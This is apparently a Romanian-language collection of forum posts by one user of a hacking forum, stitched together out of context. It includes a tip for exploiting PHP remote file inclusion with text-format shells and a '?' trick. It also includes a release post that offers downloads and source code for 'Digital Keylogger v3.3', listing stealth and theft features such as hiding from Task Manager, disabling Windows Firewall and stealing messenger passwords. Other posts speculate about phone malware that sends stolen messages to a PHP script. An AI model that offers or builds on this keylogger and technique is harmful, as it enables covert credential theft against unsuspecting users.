Nytro

Sunt foarte putine pagini vulnerabile.

Shellurile trebuie sa fie in format TXT, nu in PHP. PHP pot fi decat pe un server fara PHP, care sa nu le interpreteze. Daca sunt in format PHP, vor fi interpretate pe serverul pe care se afla, iar in pagina ta vulnerabila va aparea rezultatul parsarii shellului pe acel server. Si nu ai explicat ce e cu acel "?". E folosit pentru a transforma acel ".php" in variabila prin GET ( asta face practic ), deci va include http://.../shell.txt?.php, iar acel .php nu mai incurca. Daca pagina vulnerabila apare asa: include $_GET['page'] fara .php, atunci nu mai e necesar.

Dau si eu cate warnuri si cate banuri pot...

Unde e baiatu asta? Mi-e dor de el.

Kestor ai uitat de GatenShou.

Hmm, interesant daca serverul va sti sa faca ceva la primirea unui sms. Ar procesa comanda apoi ar sterge mesajul cu acea comanda. Dar nu cred ca se permite accesul asa de usor. De fapt nu stiu, dar trebuie macar sa intrebe telefonul ceva de genul: "Permiteti aplicatiei accesul la...".

Mersi. Mai trebuie sa pun niste mirrors.

Mersi. Super, in sfarsit a gasit cineva util programelul meu

Interesant... In caz ca nu stiati: http://paxnwo.homo.com/index_ro.php

Toata stima si respectul daca reusesti sa faci asa ceva. Insa nu prea am inteles cum primeste comenzile. Bun, e conectat la Internet, dar de unde stie ce sa faca, cum citeste comenzile? Nu stiu daca se pot folosi socketuri, si chiar daca se poate, trebuie sa te conectezi printr-un socket la un telefon. Sau, versiunea simpla, serverul din telefon reciteste o pagina ( ar produce astfel o paguba in costul suplimentar/creditul victimei ). apoi parseaza textul citit. Daca reusesti sa trimiti date catre un telefon folosindu-te de numarul de telefon, atunci cred ca vei reusi si sa trimiti mesaje, chiar sa suni, de exemplu, de pe Pc pe telefon, fara nici un ban. Oricum imi place ideea, si nu prea cred ca e imposibil, e doar greu.

Ma straduiesc si eu cat pot sa par serios

Pentru ca o sa devina foarte repede detectabil, deoarece virustotal trimit serverul catre echipele de AVs.

90% din ei nu au scris in viata lor 5 randuri in PHP.

Dar asa ar fi nevoie in primul rand de o conexiune. In al doilea rand, ar provoca cost suplimentar sau golirea creditului ( traficul la Internet ). Cat despre comunicatia client-server, nu stiu daca se poate face cu socketuri, dar se poate face folosind un script PHP, iar serverul din telefon ar face request catre script.php?mesaj=%mesaj%&dela=0744... Asta pentru a se fura informatii confidentiale, dar nu stiu daca o aplicatie poate accesa mesajele...

nosferatu: De cand sa ai Linux inseamna sa fi hacker?

In primul rand fereastra aceea, in caz ca nu ti-ai dat seama, e de la client. Acea fereastra te anunta ca serverul s-a conectat si te intreaba daca sa dai start la keylogging. Cand se deschide serverul nu apare nici o fereastra.

Ce fereastra a aparut? Scria "Connected to" ?

Name: Digital Keylogger Version: 3.3 Author: Nytro Released: 1 Februarie 2009 Powered by: Romanian Security Team Website: www.rstcenter.com Old stuff. Server size: - packed: 36.0 KB - unpacked: 112 KB Screenshot: Download: http://rapidshare.com/files/352506542/Digital_Keylogger_v3.3.exe http://www.speedyshare.com/files/21007721/Digital_Keylogger_v3.3.exe http://www.megaupload.com/?d=0NCYCZXH http://www.fileshare.ro/3215298240.5 http://www.mediafire.com/?gwialmelyrk Optiuni: - Nu apare in Task Manager la procese - Inchide Windows Firewall - Get keylog automaticaly - Gey keylog manual - Se conecteaza automat, trebuie decat sa fie clientul deschis - Close Y! pentru a fura parola de mess - Bla bla... Problema: Nu se pot conecta mai multe servere la acelasi client, o sa fac sa se poata. In plus o sa pastrez lungimea ultimei sectiuni a executabilului pe care serverul acesta o are stricata. Si mai fac si alta grafica... Timp sa am si plictisit sa fiu. Cod sursa: https://rstforums.com/proiecte/DK_v3.3.zip

O sa le pun pe toate intr-un pack dupa ce strang mai multe.

Si cum se realizeaza comunicatia client ( PC banuiesc ) si server ( telefon ), prin Bluetooth? Cred ca in VS2008 se poate pentru Windows Mobile, dar nu cred ca telefonul permite executarea oricaror comenzi.

E banal... Dar interesant

Infractiunile cibernetice fac pagube de miliarde de dolari de Bianca Dinu | 30 Ianuarie 2009 Furtul datelor si bresele de securitate cauzate de infractiunile cibernetice au costat companiile din intrega lume mii de miliarde de dolari americani. Pagubele de anul trecut au constat, de cele mai multe ori, in pierderea sau furtul proprietatilor intelectuale si in investitiile ulterioare in repararea sistemelor afectate, potrivit unui studiu realizat de McAfee. Studiul a avut la baza un chestionar la care au raspuns sute de manageri IT din Statele Unite, Europa si China. Respondentii au estimat ca au pierdut date in valoare totala de aproximativ 4.6 miliarde de dolari si au cheltuit, individual, peste 600 de milioane pentru a isi securiza sistemele de lucru. De asemenea, McAfee a relatat, fara surprindere de altfel, ca tarile dezvoltate investesc mai mult in protejarea datelor si a proprietatii intelectuale decat cele mai slab dezvoltate. O alta concluzie a studiului a fost aceea ca recesiunea la care sunt supuse companiile din intreaga lume nu face decat sa creasca riscurile de securitate. 42% dintre respondenti au declarat ca lucratorii care au fost disponibilizati, in ultimul timp, au fost cea mai mare amenintare asupra informatiilor sensibile din retelele companiilor. Interesant este faptul ca peste un sfert dintre participantii la studiu au declarat ca evita sa-si pastreze datele pe serverele din China, in timp de 47% dintre respondentii chinezi au sustinut ca, din punctul lor de vedere, SUA este cea mai mare amenintare in ceea ce priveste datele lor. Sursa: CNet

Nu imi place ideea. Toti leecherii ar aparea cu conturi de pe google sau cu ce cersesc si ei de la altii. Putini ar veni cu "munca" lor.

Yep, ditamai javra. Asta e, viata e grea, in viata dai peste multe javre ca mine. Eu te ajut sa te obisnuiesti cu ele.

Nu stiu daca cu hexatul te-ai referit la mine, dar nu prea ai cum hexa cu el. Si warn-urile le meriti, la urmatoarea abatere ban. E greu sa vorbesti frumos?